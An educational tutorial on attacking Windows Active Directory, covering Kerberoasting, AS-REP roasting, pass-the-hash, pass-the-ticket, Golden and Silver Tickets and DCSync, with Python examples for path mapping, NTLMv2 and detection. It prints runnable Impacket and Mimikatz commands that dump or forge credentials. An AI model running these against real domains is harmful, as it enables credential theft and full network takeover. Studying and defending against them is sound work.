Ethical Hacking Active Directory Attacks
Active Directory (AD) is Microsoft's directory service that manages authentication and authorization across Windows-based enterprise networks. Nearly every medium-to-large organization runs Active Directory. It controls who can log in to which computer, what resources each user can access, and how policies are enforced across thousands of machines from a central point.
Because Active Directory is the backbone of Windows enterprise environments, compromising it means compromising everything the organization owns. Domain Admin — the highest privilege in Active Directory — grants complete control over every Windows machine in the network. This makes AD the ultimate target in most enterprise penetration tests.
Active Directory Key Concepts
Domain
A domain is a collection of objects — users, computers, printers, and groups — managed by a central authority. All objects in the domain share a common namespace (e.g., company.local) and authentication database.
Domain Controller (DC)
The domain controller is the server that runs Active Directory Domain Services. It authenticates all login requests, enforces Group Policy, and stores the AD database (NTDS.dit) containing every user's credential hash. Compromising the domain controller means access to every credential in the organization.
Kerberos Authentication
Active Directory uses the Kerberos protocol for authentication. When a user logs in:
- The user's workstation sends an AS-REQ to the Key Distribution Center (KDC) on the domain controller, including pre-authentication data: the current timestamp encrypted with a key derived from the user's password.
- The KDC decrypts the timestamp with the copy of that key stored in NTDS.dit and, if it matches, issues a Ticket Granting Ticket (TGT) encrypted with the KRBTGT account's key, which only domain controllers hold.
- When the user accesses a service (a file server, a database), the workstation presents the TGT to the KDC in a TGS-REQ and asks for a service ticket for that service's Service Principal Name (SPN).
- The service ticket is encrypted with the service account's key; the service decrypts it, reads the user's identity and group memberships from it, and grants access accordingly.
Kerberos tickets are stored in memory. Extracting them enables attackers to authenticate to services as the ticket holder without knowing their password.
LDAP Enumeration and BloodHound
Before attacking Active Directory, an ethical hacker maps the domain structure. BloodHound is the standard tool for this: its collector gathers users, groups, computers, ACLs and trusts over LDAP, plus logged-on sessions and local group memberships over SMB/RPC, and BloodHound loads the result into a graph database and visualizes the domain as a graph, showing attack paths from any user account to Domain Admin.
BloodHound Attack Path Example
BloodHound might reveal: "Standard User A is a member of Help Desk Group → Help Desk Group has GenericAll permission on User B → User B is a member of Domain Admins." GenericAll is full control over User B's object, which lets anyone in the Help Desk group reset User B's password (or add an SPN to the account and Kerberoast it). This three-hop path shows the ethical hacker exactly how to escalate from a standard account to Domain Admin without exploiting any software vulnerability, purely by abusing legitimate AD relationships.
Data collectors: SharpHound (a .NET binary run on a domain-joined Windows host) or BloodHound.py (run from Kali Linux with a set of domain credentials).
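As an added example (not BloodHound's or SharpHound's own code), here is the graph search BloodHound performs once a collector has gathered the edges. The edge list is constructed for this example and includes the three-hop Help Desk path described above; every principal and host name in it is invented:

```python
from collections import deque

# Constructed sample of BloodHound-style edges as (source, edge_type, target).
# MemberOf   = group membership
# GenericAll = full control of the target object's ACL (e.g. reset its password)
# AdminTo    = local Administrators on the target host
# All names are invented for this example.
EDGES = [
    ("UserA", "MemberOf", "Help Desk"),
    ("Help Desk", "GenericAll", "UserB"),
    ("UserB", "MemberOf", "Domain Admins"),
    ("UserA", "AdminTo", "WS01.company.local"),
    ("svc_sql", "MemberOf", "SQL Admins"),
    ("SQL Admins", "AdminTo", "SQL01.company.local"),
    ("Domain Admins", "AdminTo", "DC01.company.local"),
]


def build_graph(edges):
    """Adjacency list: node -> [(edge_type, target), ...]. Edges are directed."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src, []).append((kind, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns the list of hops (src, edge_type, dst) or None."""
    if start not in graph or goal not in graph:
        return None
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while parent[node] is not None:
                prev, kind = parent[node]
                hops.append((prev, kind, node))
                node = prev
            return hops[::-1]
        for kind, nxt in graph[node]:
            if nxt not in parent:
                parent[nxt] = (node, kind)
                queue.append(nxt)
    return None


def describe(hops):
    """Render a path the way BloodHound's UI reads it."""
    text = hops[0][0]
    for _, kind, dst in hops:
        text += f" -[{kind}]-> {dst}"
    return text


def principals_reaching(graph, goal):
    """Every principal with some path to the goal: the 'from any user' view."""
    return sorted(n for n in graph if n != goal and shortest_path(graph, n, goal))


if __name__ == "__main__":
    g = build_graph(EDGES)
    print(describe(shortest_path(g, "UserA", "Domain Admins")))
    print("Can reach Domain Admins:", principals_reaching(g, "Domain Admins"))
```

BloodHound's real database carries many more edge types (WriteDacl, AddMember, HasSession, AllowedToDelegate and so on), but the query is the same shortest-path search over directed edges; the value is in the collected data, not in the algorithm.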
Kerberoasting
Kerberoasting is one of the most common and effective Active Directory attacks. It targets service accounts that have a Service Principal Name (SPN) registered in Active Directory.
How Kerberoasting Works
Any authenticated domain user can request a service ticket for any service with an SPN; the KDC does not check whether the user is actually allowed to use that service. The service ticket is encrypted with the service account's Kerberos key, which is derived from the account's password (for RC4 tickets the key is the NT hash itself). The attacker requests service tickets for all SPN-registered accounts and takes the encrypted tickets offline for cracking: each candidate password is turned into a key and tried against the ticket. If the service account password is weak, the attacker recovers it from the ticket without ever sending a single guess to the domain controller.
Service accounts often have weak, static passwords set years ago — they never expire because changing them requires updating every application that uses them. Kerberoasting frequently yields valid domain credentials.
GetUserSPNs.py -request -dc-ip 192.168.1.10 company.local/user:password -outputfile kerberoast.txt
The extracted tickets are cracked with Hashcat using hash type -m 13100 (Kerberos 5 TGS-REP, etype 23, RC4-HMAC). A ticket that comes back AES-encrypted instead (etype 17 or 18) needs -m 19600 or -m 19700 and cracks far more slowly, which is why attackers prefer accounts that still accept RC4.
AS-REP Roasting
AS-REP Roasting targets accounts that have "Do not require Kerberos preauthentication" enabled. Kerberos preauthentication is a security feature that requires the client to encrypt a timestamp with the user's key before the KDC issues a TGT, so an attacker cannot obtain anything encrypted under that key without already knowing the password. For accounts without this protection, anyone who can reach the KDC and knows the username, with no credentials at all, can send an AS-REQ and receive an AS-REP whose encrypted part is protected with the account's key, which is then cracked offline (Hashcat mode -m 18200 for the RC4 form).
GetNPUsers.py company.local/ -usersfile userlist.txt -dc-ip 192.168.1.10 -format hashcat -outputfile asrep.txt
Pass-the-Hash in Active Directory
In Windows environments using NTLM authentication (which AD falls back to whenever Kerberos is unavailable, for example when a client targets an IP address rather than a hostname with an SPN), the password hash itself is the credential: the client proves possession of the NT hash by computing an HMAC over the server's challenge, and no plaintext password is ever needed. An attacker who extracts an administrator's NT hash from one machine uses it directly to authenticate to every other machine where that account is valid, whether a domain account anywhere in the domain or a local administrator account on every machine built with the same local admin password.
Tools: Impacket's psexec.py, CrackMapExec, Mimikatz
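As an added example (not code from the page or from any of the tools named above), the NTLMv2 computation from MS-NLMP shows why the hash alone is enough: both the client's response and the server's check are HMAC-MD5 keyed by a value derived from the NT hash, so a client that holds only the hash produces exactly what a client holding the password would. The server challenge, timestamp and target info are constructed values, and the NT hash used is the widely published hash of the password "password":

```python
import hashlib
import hmac
import struct

# Added example, not from the page or any tool: the NTLMv2 computation
# (MS-NLMP 3.3.2) from the NT hash alone, which is all pass-the-hash needs.
# Challenge, timestamp and target info below are constructed values.


def ntowfv2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """ResponseKeyNT = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_temp(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The 'temp' blob: RespType 1, HiRespType 1, 6 zero bytes, FILETIME,
    8-byte client nonce, 4 zero bytes, AV_PAIRs from the server, 4 zero bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, temp: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || temp. The password never appears."""
    proof = hmac.new(ntowfv2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def server_verify(stored_nt_hash: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """What the DC (or a standalone host, for a local account) does with the hash it stores."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowfv2(stored_nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


if __name__ == "__main__":
    # The attacker holds only the NT hash (here the well-known hash of "password"),
    # e.g. dumped from LSASS or the SAM of a machine already under their control.
    stolen = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    server_challenge = bytes.fromhex("0123456789abcdef")                         # constructed
    temp = ntlmv2_temp(0x01D9E0E0D3C2B1A0, b"\x11" * 8, b"\x00\x00\x00\x00")      # constructed; EOL AV_PAIR
    resp = ntlmv2_response(stolen, "administrator", "COMPANY", server_challenge, resp_temp := temp)
    print("server accepted hash-only client:",
          server_verify(stolen, "administrator", "COMPANY", server_challenge, resp))
```

psexec.py -hashes :NTHASH feeds the NT hash into this same computation. Because the server reproduces the HMAC from the hash it has stored, it cannot tell a hash-holder from a password-holder; the only defences are to keep the hash out of the attacker's reach (Credential Guard, LAPS for local admin passwords, no admin logons to untrusted hosts) or to disable NTLM.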
psexec.py -hashes :NTLMHASH administrator@192.168.1.20
The -hashes argument is LMHASH:NTHASH; the LM half is left empty because modern Windows does not store LM hashes.
Pass-the-Ticket
Kerberos tickets (TGTs and service tickets) are stored in memory on Windows machines. An attacker with local admin or SYSTEM access extracts these tickets using Mimikatz and injects them into their own session — authenticating as the original ticket holder to any service that ticket grants access to, even after the original user has logged out.
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt ticket.kirbi
Golden Ticket Attack
The Golden Ticket is one of the most powerful attacks in Active Directory. To create one, the attacker needs:
- The domain name
- The domain SID
- The NTLM hash of the KRBTGT account — the special service account whose key encrypts all TGTs in the domain
With the KRBTGT hash, the attacker forges a TGT for any account, with any group memberships, valid for any duration. The KDC validates an incoming TGT by decrypting it with the KRBTGT key and checking the PAC signature made with that same key, so a forged TGT is indistinguishable from a real one and the KDC issues service tickets for it to any service in the domain. The attacker effectively becomes any user in the domain, including Domain Admin, for as long as they want, even if the real Domain Admin password is changed.
Recovering from a Golden Ticket attack requires changing the KRBTGT account password twice, waiting for replication in between (the KDC still accepts tickets encrypted under the previous KRBTGT key, so a single reset does not invalidate forged TGTs), then resetting all domain administrator passwords and establishing how the attacker obtained the KRBTGT hash in the first place.
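A forged TGT is never requested from a KDC, so the detection angle is the absence of a TGT request rather than anything in the ticket itself. As an added example (not from the page, and not a product's detection rule), the following hunt runs two standard heuristics over constructed Security-log events: a service ticket request (event 4769) for an account and source IP that never produced a TGT request (4768) or renewal (4770) on any DC within a TGT lifetime, and RC4 (etype 0x17) service tickets in a domain whose accounts normally use AES, which older Golden Ticket tooling produces by default. Event contents, account names and addresses are invented:

```python
# Added example, not from the page: a minimal Golden Ticket hunt over
# constructed Security-log events. A real TGT is always preceded by a 4768
# (TGT requested) or 4770 (TGT renewed) on some DC; a forged TGT is never
# requested from a KDC, so it surfaces only as 4769 (service ticket requested).
AES_TYPES = {"0x11", "0x12"}
NO_TGT = "service ticket with no TGT request from this account/IP"
RC4_TICKET = "RC4 (0x17) ticket in an AES domain"

# Constructed events: (seconds since start, event id, account, source IP, etype, service).
# In production these fields come from TargetUserName, IpAddress,
# TicketEncryptionType and ServiceName, merged from every DC and sorted by time.
EVENTS = [
    (0,    4768, "alice",         "10.0.0.5",  "0x12", None),
    (5,    4769, "alice",         "10.0.0.5",  "0x12", "cifs/fs01.company.local"),
    (60,   4769, "alice",         "10.0.0.5",  "0x12", "ldap/dc01.company.local"),
    (300,  4769, "Administrator", "10.0.0.99", "0x17", "cifs/dc01.company.local"),
    (3600, 4768, "bob",           "10.0.0.7",  "0x12", None),
    (3605, 4769, "bob",           "10.0.0.7",  "0x17", "MSSQLSvc/sql01.company.local:1433"),
]


def hunt_golden_tickets(events, tgt_lifetime=10 * 3600, expect_aes=True):
    """Return (reason, event) alerts. Events must be time-sorted and cover all DCs;
    a 4768 on one DC followed by 4769s on another is normal and must not alert."""
    last_tgt = {}          # (account, ip) -> time of the most recent 4768/4770
    alerts = []
    for ev in events:
        t, event_id, account, ip, etype, _service = ev
        key = (account, ip)
        if event_id in (4768, 4770):
            last_tgt[key] = t
        elif event_id == 4769:
            seen = last_tgt.get(key)
            if seen is None or t - seen > tgt_lifetime:
                alerts.append((NO_TGT, ev))
            # Weak signal on its own: a service whose account only has RC4 keys
            # also produces 0x17 tickets. Strong in combination with NO_TGT.
            if expect_aes and etype not in AES_TYPES:
                alerts.append((RC4_TICKET, ev))
    return alerts


if __name__ == "__main__":
    for reason, ev in hunt_golden_tickets(EVENTS):
        print(f"t={ev[0]:>5} {ev[1]} {ev[2]}@{ev[3]} etype={ev[4]} svc={ev[5]}: {reason}")
```

On this data Administrator fires both rules (a ticket used from 10.0.0.99 with no TGT request anywhere, and RC4 in an AES domain), while bob fires only the RC4 rule, which on its own is usually a legacy service account rather than a forgery. The first rule is only sound when the log set really covers every DC and the window exceeds the domain's TGT lifetime; otherwise a TGT issued by an unmonitored DC looks exactly like a forged one.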
Silver Ticket Attack
A Silver Ticket is a forged service ticket for a specific service. It requires the domain SID and the service account's hash, not the KRBTGT hash; for services that run as the machine itself (CIFS, HOST, HTTP on a member server) that is the computer account's hash. Silver Tickets are harder to detect than Golden Tickets because the ticket is validated by the service itself rather than the domain controller, so the forgery leaves no 4768/4769 events on the DC. The attacker forges access to a specific service, an SQL server, a web application, a file share, without ever contacting the DC, unless the service performs PAC validation, which services running as SYSTEM skip by default.
DCSync Attack
Domain controllers replicate their database to each other over the Directory Replication Service (DRS) protocol. Any account holding the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object (by default Domain Admins, Enterprise Admins, Administrators and the domain controllers themselves) can request this replication data. The attacker uses Mimikatz's DCSync feature to impersonate a domain controller and request the password hashes of chosen accounts, or of every account, including KRBTGT and every Domain Admin, directly from a real domain controller, without logging into the DC or running code on it. ACLs that grant these two rights to a backup, sync or service account turn that account into a direct path to full domain compromise.
mimikatz # lsadump::dcsync /domain:company.local /user:Administrator
This retrieves the Administrator's NTLM hash (and Kerberos keys) directly; the same command with /user:krbtgt yields the key needed for a Golden Ticket. From there, a pass-the-hash attack provides full domain access. Impacket's secretsdump.py performs the same replication request from Linux. On the defensive side, DCSync appears as Directory Service Access event 4662 carrying the replication right GUIDs, from a source that is not a domain controller.
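The check a defender runs before the attacker does is to walk the domain object's DACL and list every trustee that ends up with both replication rights. As an added example (not from the page or from any tool; a real audit reads the DACL with PowerShell or BloodHound and resolves nested group membership, which this does not), the following evaluates a constructed, simplified set of ACEs. The GUIDs are the real extended-right identifiers; the trustee names, the ACE list and the baseline of expected holders are assumptions for the example:

```python
from collections import defaultdict

# Added example, not from the page: who can DCSync, decided from the domain
# object's DACL. The two extended rights below are the real AD GUIDs.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
REPLICATION_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL}

# Assumed baseline of principals expected to hold both; take this from a
# known-good domain in a real audit rather than trusting a list.
BASELINE = {"Domain Admins", "Enterprise Admins", "Administrators", "Domain Controllers"}

# Constructed ACEs from the domain head, reduced to what matters here:
# trustee, Allow/Deny, the access-mask flags, and the ObjectType GUID
# (None means the ACE is not object-specific and covers every extended right).
ACES = [
    {"trustee": "Domain Admins",      "type": "Allow", "rights": {"ControlAccess"}, "object": GET_CHANGES},
    {"trustee": "Domain Admins",      "type": "Allow", "rights": {"ControlAccess"}, "object": GET_CHANGES_ALL},
    {"trustee": "Domain Controllers", "type": "Allow", "rights": {"ControlAccess"}, "object": GET_CHANGES},
    {"trustee": "Domain Controllers", "type": "Allow", "rights": {"ControlAccess"}, "object": GET_CHANGES_ALL},
    {"trustee": "Help Desk",          "type": "Allow", "rights": {"ControlAccess"}, "object": GET_CHANGES},
    {"trustee": "backup_svc",         "type": "Allow", "rights": {"ControlAccess"}, "object": None},
    {"trustee": "app_admin",          "type": "Allow", "rights": {"GenericAll"},    "object": None},
    {"trustee": "app_admin",          "type": "Deny",  "rights": {"ControlAccess"}, "object": GET_CHANGES_ALL},
]


def granted_replication_rights(aces):
    """Map trustee -> set of replication GUIDs effectively allowed.
    Deny ACEs win over Allow ACEs, matching canonical DACL ordering."""
    allowed, denied = defaultdict(set), defaultdict(set)
    for ace in aces:
        if not ({"ControlAccess", "GenericAll"} & ace["rights"]):
            continue   # neither an extended-right grant nor full control
        covers = REPLICATION_RIGHTS if ace["object"] is None else {ace["object"]} & REPLICATION_RIGHTS
        bucket = denied if ace["type"] == "Deny" else allowed
        bucket[ace["trustee"]] |= covers
    return {trustee: rights - denied[trustee] for trustee, rights in allowed.items()}


def who_can_dcsync(aces):
    """Trustees holding both rights: each of these can run lsadump::dcsync."""
    return sorted(t for t, r in granted_replication_rights(aces).items() if REPLICATION_RIGHTS <= r)


def unexpected_dcsync(aces, baseline=BASELINE):
    return [t for t in who_can_dcsync(aces) if t not in baseline]


if __name__ == "__main__":
    print("can DCSync:", who_can_dcsync(ACES))
    print("not in baseline:", unexpected_dcsync(ACES))
```

Here Help Desk has only Get-Changes and cannot replicate secrets, app_admin's GenericAll is cancelled by an explicit Deny on Get-Changes-All, and backup_svc is the finding: an ACE granting all extended rights that was probably added for a sync tool and hands out DCSync as a side effect.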
Active Directory Attack Path Diagram
Think of Active Directory as a medieval kingdom with a royal court:
- Kingdom (domain) — Contains all subjects and resources
- Castle keep (domain controller) — Holds the keys to everything
- Crown jewels (KRBTGT hash) — Used to forge any golden passport
- Court messenger (Kerberos KDC) — Issues and validates passes
- Nobility (privileged service accounts) — Targeted by Kerberoasting
- Peasants with keys (standard users holding misconfigured ACL rights or local admin on the wrong hosts) — Attack paths found by BloodHound
An ethical hacker who reaches the Crown Jewels (KRBTGT hash) has effectively won the entire kingdom.
Key Points
- Active Directory controls all authentication and authorization in Windows enterprise environments; Domain Admin is the ultimate prize.
- BloodHound maps AD relationships and identifies attack paths from any user to Domain Admin.
- Kerberoasting extracts service tickets for offline cracking using nothing more than a standard domain account.
- AS-REP Roasting targets accounts without Kerberos preauthentication enabled.
- Golden Ticket attacks forge TGTs using the KRBTGT hash, granting persistent domain access that survives password resets and is hard to detect.
- DCSync requests credential replication from a domain controller without logging into it.
